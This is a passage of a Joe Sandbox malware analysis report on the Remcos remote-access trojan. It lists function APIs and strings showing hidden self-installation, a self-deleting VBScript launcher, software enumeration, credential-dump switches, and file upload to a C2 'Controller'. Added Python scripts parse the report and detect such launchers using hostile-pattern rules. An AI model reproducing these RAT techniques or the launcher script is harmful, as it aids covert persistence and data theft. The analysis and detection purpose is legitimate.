                                                        • API String ID: 1579085052-2309681474
                                                        • Opcode ID: cf3ade877b167e70c46e53b810f9fed9df6f55308ddf96a6d8fe48dcf536bada
                                                        • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                        • Opcode Fuzzy Hash: cf3ade877b167e70c46e53b810f9fed9df6f55308ddf96a6d8fe48dcf536bada
                                                        • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
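Every function block in this section has the same layout: an "APIs" list of `Name.MODULE(args), ref: ADDR` lines (some prefixed with "Part of subcall function …"), followed by the "Similarity" metadata whose "String ID" is a `$`-separated list of the strings the function references. The script below, added here as an example and not part of the Joe Sandbox report or of Remcos, parses that layout and tags each function with the behaviour its API and string combination implies (the installer above: CopyFileW, SetFileAttributesW with 00000007, ShellExecuteW, ExitProcess). `SAMPLE` is a constructed, trimmed excerpt of three functions from this report; the regexes, tag names and rules are the example's own, not Joe Sandbox output.

```python
"""Parse the per-function 'APIs' / 'Similarity' blocks of a Joe Sandbox report and tag
each function with the behaviour its API + string combination implies.
Added example, not part of the report or of Remcos. SAMPLE is a constructed, trimmed
excerpt of three functions from this report, kept in the report's own layout."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

SAMPLE = r'''
APIs
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
• CopyFileW.KERNEL32 ref: 0040CFBF
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
• ExitProcess.KERNEL32 ref: 0040D09D
• String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
• Opcode ID: cf3ade877b167e70c46e53b810f9fed9df6f55308ddf96a6d8fe48dcf536bada
APIs
• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
• RegEnumKeyExA.ADVAPI32 ref: 0041C786
• RegCloseKey.ADVAPI32(?), ref: 0041CA50
• String ID: DisplayName$DisplayVersion$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
• Opcode ID: f13192da4e66231cc3a913cdaba6528dc2f099d68fe13da123ac92ab36a9ee38
APIs
  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
• GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
• ExitProcess.KERNEL32 ref: 0040D9FF
• String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
• Opcode ID: f9fb1c58427f12af755a52ca3692b6cbef369107a25d9b00b3b70057595488dd
'''

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR", optionally prefixed with
# "Part of subcall function XXXX:" when the call happens inside a callee.
API_RE = re.compile(r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
                    r"([A-Za-z_]\w*)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$")
META_RE = re.compile(r"^\s*•\s*([A-Za-z ]+?):\s*(.*)$")  # "• API ID: ...", "• String ID: ..."
ApiCall = namedtuple("ApiCall", "name module args ref subcall")

@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # the '$'-separated "String ID" entries
    meta: dict = field(default_factory=dict)
    tags: list = field(default_factory=list)

def parse_blocks(text):
    blocks, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":          # every function block in the report starts here
            cur = FunctionBlock()
            blocks.append(cur)
        elif cur is None:
            continue
        elif (m := API_RE.match(line)):
            name, module, args, ref = m.groups()
            cur.apis.append(ApiCall(name, module, args.split(",") if args else [], ref,
                                    "Part of subcall" in line))
        elif (m := META_RE.match(line)):
            key, value = m.groups()
            cur.meta[key] = value
            if key == "String ID":
                cur.strings = [s for s in value.split("$") if s]
    return blocks

def decode_file_attributes(arg):
    """Decode a dwFileAttributes value as printed in the report (e.g. 00000007)."""
    if not re.fullmatch(r"[0-9A-Fa-f]{1,8}", arg):
        return []                           # '?' means the sandbox could not resolve it
    v = int(arg, 16)
    return [n for bit, n in {0x1: "READONLY", 0x2: "HIDDEN", 0x4: "SYSTEM", 0x80: "NORMAL"}.items() if v & bit]

def has_api(b, name):
    return any(c.name == name for c in b.apis)

def has_str(b, needle):
    return any(needle in s for s in b.strings)

def hides_copy(b):
    """SetFileAttributesW with HIDDEN|SYSTEM set, as in the installer function above."""
    return any(c.name == "SetFileAttributesW" and len(c.args) > 1
               and {"HIDDEN", "SYSTEM"} <= set(decode_file_attributes(c.args[1])) for c in b.apis)

# Behaviour tags; each is an API/string combination that appears in this report.
RULES = [
    ("self_install_hidden_copy", lambda b: has_api(b, "CopyFileW") and has_api(b, "ShellExecuteW") and hides_copy(b)),
    ("vbs_self_delete", lambda b: has_str(b, ".vbs") and has_str(b, "DeleteFile(Wscript.ScriptFullName)")),
    ("installed_software_recon", lambda b: has_api(b, "RegEnumKeyExA") and has_str(b, r"CurrentVersion\Uninstall")),
    ("nirsoft_stext_dump", lambda b: has_str(b, "/stext")),
    ("c2_file_upload", lambda b: has_str(b, "Uploading file to Controller")),
    ("c2_tls_connect", lambda b: has_api(b, "connect") and has_str(b, "TLS")),
]

def analyze(text):
    """Return the parsed blocks with their behaviour tags filled in."""
    blocks = parse_blocks(text)
    for b in blocks:
        b.tags = [tag for tag, rule in RULES if rule(b)]
    return blocks
```

The attribute decoder turns the `00000007` passed to SetFileAttributesW into READONLY|HIDDEN|SYSTEM (FILE_ATTRIBUTE_READONLY = 0x1, HIDDEN = 0x2, SYSTEM = 0x4), which is why the installed copy is invisible to a default Explorer view. The rules are plain substring matches on what the sandbox already extracted; they are a triage aid for reading a long report, not a detection signature.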
                                                        APIs
                                                        • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                        • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                        • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                        • FindFirstVolumeW.KERNEL32 ref: 0041C133
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                        • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                        • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                        • _wcslen.LIBCMT ref: 0041C1CC
                                                        • FindVolumeClose.KERNEL32 ref: 0041C1EC
                                                        • GetLastError.KERNEL32 ref: 0041C204
                                                        • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                        • lstrcatW.KERNEL32 ref: 0041C24A
                                                        • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                        • GetLastError.KERNEL32 ref: 0041C261
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                        • String ID: ?
                                                        • API String ID: 3941738427-1684325040
                                                        • Opcode ID: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                        • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                        • Opcode Fuzzy Hash: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                        • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                        APIs
                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                        • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                        • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                        • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                        • String ID: EIA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                        • API String ID: 2490988753-3346362794
                                                        • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                        • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                        • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                        • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                          • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                          • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                          • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                        • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                        • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                        • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                        • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                        • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                        • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                        • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                        • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                        • String ID: /stext "$0TG$0TG$NG$NG
                                                        • API String ID: 1223786279-2576077980
                                                        • Opcode ID: 8b5758fc960045b70db6b1621d1f1f5248a15739f774e2f35fdd395e03aad00d
                                                        • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                        • Opcode Fuzzy Hash: 8b5758fc960045b70db6b1621d1f1f5248a15739f774e2f35fdd395e03aad00d
                                                        • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$EnvironmentVariable
                                                        • String ID:
                                                        • API String ID: 1464849758-0
                                                        • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                        • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                        • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                        • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                        APIs
                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                        • RegEnumKeyExA.ADVAPI32 ref: 0041C786
                                                        • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseEnumOpen
                                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                        • API String ID: 1332880857-3714951968
                                                        • Opcode ID: f13192da4e66231cc3a913cdaba6528dc2f099d68fe13da123ac92ab36a9ee38
                                                        • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                        • Opcode Fuzzy Hash: f13192da4e66231cc3a913cdaba6528dc2f099d68fe13da123ac92ab36a9ee38
                                                        • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                        APIs
                                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                        • GetCursorPos.USER32(?), ref: 0041D67A
                                                        • SetForegroundWindow.USER32(?), ref: 0041D683
                                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                        • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                        • ExitProcess.KERNEL32 ref: 0041D6F6
                                                        • CreatePopupMenu.USER32 ref: 0041D6FC
                                                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                        • String ID: Close
                                                        • API String ID: 1657328048-3535843008
                                                        • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                        • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                        • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                        • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$Info
                                                        • String ID:
                                                        • API String ID: 2509303402-0
                                                        • Opcode ID: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                        • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                        • Opcode Fuzzy Hash: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                        • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
                                                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                        • __aulldiv.LIBCMT ref: 00408D88
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                        • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                        • CloseHandle.KERNEL32(00000000), ref: 00408FE9
                                                        • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                        • API String ID: 3086580692-2582957567
                                                        • Opcode ID: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                                        • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                        • Opcode Fuzzy Hash: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                                        • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                        APIs
                                                        • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                          • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                          • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                          • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                          • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                                                          • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,00000000,00000000,00000000), ref: 0040A962
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                        • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                        • API String ID: 3795512280-1152054767
                                                        • Opcode ID: ff793148450d5445b41cee081077762d1b1ae7bc4452be26425da9ad383290d3
                                                        • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                        • Opcode Fuzzy Hash: ff793148450d5445b41cee081077762d1b1ae7bc4452be26425da9ad383290d3
                                                        • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                                        APIs
                                                        • connect.WS2_32(?,?,?), ref: 004048E0
                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                        • WSAGetLastError.WS2_32 ref: 00404A21
                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                        • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                        • API String ID: 994465650-3229884001
                                                        • Opcode ID: f8a90a434b368baa81854eed5f01dc5ff272a353476d3d54f953a4ddd85b29a4
                                                        • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                        • Opcode Fuzzy Hash: f8a90a434b368baa81854eed5f01dc5ff272a353476d3d54f953a4ddd85b29a4
                                                        • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                                                        APIs
                                                        • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                          • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                        • _free.LIBCMT ref: 0045137F
                                                          • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                          • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                        • _free.LIBCMT ref: 004513A1
                                                        • _free.LIBCMT ref: 004513B6
                                                        • _free.LIBCMT ref: 004513C1
                                                        • _free.LIBCMT ref: 004513E3
                                                        • _free.LIBCMT ref: 004513F6
                                                        • _free.LIBCMT ref: 00451404
                                                        • _free.LIBCMT ref: 0045140F
                                                        • _free.LIBCMT ref: 00451447
                                                        • _free.LIBCMT ref: 0045144E
                                                        • _free.LIBCMT ref: 0045146B
                                                        • _free.LIBCMT ref: 00451483
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                        • String ID:
                                                        • API String ID: 161543041-0
                                                        • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                        • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                        • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                        • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                        APIs
                                                          • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                          • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                          • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 0041374F
                                                          • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32 ref: 00413768
                                                          • Part of subcall function 00413733: RegCloseKey.ADVAPI32(?), ref: 00413773
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                        • ExitProcess.KERNEL32 ref: 0040D9FF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                        • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                        • API String ID: 1913171305-3159800282
                                                        • Opcode ID: f9fb1c58427f12af755a52ca3692b6cbef369107a25d9b00b3b70057595488dd
                                                        • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                        • Opcode Fuzzy Hash: f9fb1c58427f12af755a52ca3692b6cbef369107a25d9b00b3b70057595488dd
                                                        • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
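The function above (GetModuleFileNameW, a `.vbs` written under `Temp`, ShellExecuteW `open`, then ExitProcess) assembles a VBScript launcher from the fragments in its String ID list: `CreateObject("WScript.Shell").Run "cmd /c ""` + exepath + `""", 0` followed by `CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)`. The following scanner is an added example, not part of the Joe Sandbox report and not Remcos code: it flags scripts that carry both markers. The exact script layout is inferred from the string order, and both sample scripts are constructed for the demo, not artefacts recovered from the sandbox run.

```python
"""Flag VBScript launchers shaped like the one the function above writes to %Temp%.

Added example, not part of the report. The two markers come from the function's
String ID list; SAMPLE_LAUNCHER and SAMPLE_BENIGN are constructed inputs.
"""
import re
from pathlib import Path

# Marker 1: the script deletes itself once it has run (from the String ID list).
SELF_DELETE = 'CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)'
# Marker 2: hidden (window style 0) "cmd /c "<path>"" launch; layout inferred from
# the fragments '...Run "cmd /c ""' and '""", 0' in the same string list.
HIDDEN_CMD = re.compile(
    r'CreateObject\("WScript\.Shell"\)\.Run\s+"cmd /c ""(?P<cmd>.*?)"""\s*,\s*0',
    re.IGNORECASE | re.DOTALL,
)

def classify_vbs(text: str) -> dict:
    """Report which markers a script contains and the command it would launch, if any."""
    norm = re.sub(r"\s+", " ", text)
    m = HIDDEN_CMD.search(norm)
    return {
        "self_delete": SELF_DELETE.lower() in norm.lower(),
        "hidden_cmd": m.group("cmd") if m else None,
    }

def is_remcos_style_launcher(text: str) -> bool:
    """Both markers together: a hidden cmd /c launch plus deletion of the script itself."""
    r = classify_vbs(text)
    return r["self_delete"] and r["hidden_cmd"] is not None

def scan_dir(root: Path) -> list:
    """Walk a directory (for example a copied %Temp%) and return (path, details) for hits."""
    hits = []
    for p in root.rglob("*.vbs"):
        try:
            text = p.read_text(errors="replace")
        except OSError:
            continue
        if is_remcos_style_launcher(text):
            hits.append((p, classify_vbs(text)))
    return hits

# Constructed samples (not recovered files): a launcher in the shape the function
# assembles, and a benign logon script for contrast.
SAMPLE_LAUNCHER = (
    'CreateObject("WScript.Shell").Run "cmd /c ""C:\\Users\\user\\AppData\\Local\\Temp\\update.exe""", 0\r\n'
    'CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\r\n'
)
SAMPLE_BENIGN = (
    'Set sh = CreateObject("WScript.Shell")\r\n'
    'sh.Run "notepad.exe", 1\r\n'
)

if __name__ == "__main__":
    for name, s in (("launcher", SAMPLE_LAUNCHER), ("benign", SAMPLE_BENIGN)):
        print(name, is_remcos_style_launcher(s), classify_vbs(s))
```

The self-delete line alone is common in legitimate one-shot scripts; requiring the hidden `cmd /c` launch as well keeps the check specific to this launcher shape. Run `scan_dir(Path(r"C:\Users\<user>\AppData\Local\Temp"))` over a triage copy of the user's Temp directory to hunt for leftovers.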
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
